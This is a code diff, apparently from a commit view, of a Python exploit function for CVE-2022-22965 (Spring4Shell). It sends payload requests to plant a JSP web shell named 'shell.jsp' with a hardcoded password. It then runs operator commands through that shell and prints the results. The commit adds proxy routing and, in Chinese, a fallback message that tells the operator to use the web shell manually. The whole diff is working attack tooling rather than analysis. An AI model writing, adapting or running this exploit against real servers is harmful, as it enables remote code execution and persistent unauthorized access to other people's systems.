@@ -41,15 +41,14 @@ def CVE_2022_22965(url, proxies):
4141 getpayload = url + payload_http
4242 try :
4343 requests .packages .urllib3 .disable_warnings ()
44- requests .post (url , headers = Headers_2 , data = file_date_data , verify = False )
44+ requests .post (url , headers = Headers_2 , data = file_date_data , verify = False , proxies = proxies )
4545 requests .post (url , headers = Headers_2 , data = payload_other , timeout = 6 , allow_redirects = False , verify = False , proxies = proxies )
4646 requests .post (url , headers = Headers_1 , data = payload_linux , timeout = 6 , allow_redirects = False , verify = False , proxies = proxies )
4747 sleep (0.5 )
4848 requests .post (url , headers = Headers_1 , data = payload_win , timeout = 6 , allow_redirects = False , verify = False , proxies = proxies )
4949 sleep (0.5 )
5050 requests .get (getpayload , headers = Headers_1 , timeout = 6 , allow_redirects = False , verify = False , proxies = proxies )
5151 sleep (0.5 )
52- requests .get (url , headers = Headers_1 , timeout = 6 , allow_redirects = False , verify = False , proxies = proxies )
5352 test = requests .get (url + "shell.jsp" , verify = False , proxies = proxies )
5453 test_again = requests .get (url + "shell.jsp" , verify = False , proxies = proxies )
5554 if (test .status_code == 500 ) or (test_again .status_code == 200 ):
@@ -61,9 +60,13 @@ def CVE_2022_22965(url, proxies):
6160 url_shell = url + "shell.jsp?pwd=aabysszg&cmd={}" .format (Cmd )
6261 r = requests .get (url_shell , verify = False , proxies = proxies )
6362 r_again = requests .get (url_shell , verify = False , proxies = proxies )
64- resp = r_again .text
65- result = re .findall ('([^\x00 ]+)\n ' , resp )[0 ]
66- cprint (result ,"green" )
63+ if r_again .status_code == 500 :
64+ cprint ("[-] 重发包返回状态码500,请手动尝试利用WebShell:shell.jsp?pwd=aabysszg&cmd=whoami\n " ,"yellow" )
65+ break
66+ else :
67+ resp = r_again .text
68+ result = re .findall ('([^\x00 ]+)\n ' , resp )[0 ]
69+ cprint (result ,"green" )
6770 else :
6871 cprint ("[-] CVE-2022-22965漏洞不存在或者已经被利用,shell地址请手动尝试访问:\n [/shell.jsp?pwd=aabysszg&cmd=命令] \n " ,"yellow" )
6972 except KeyboardInterrupt :
0 commit comments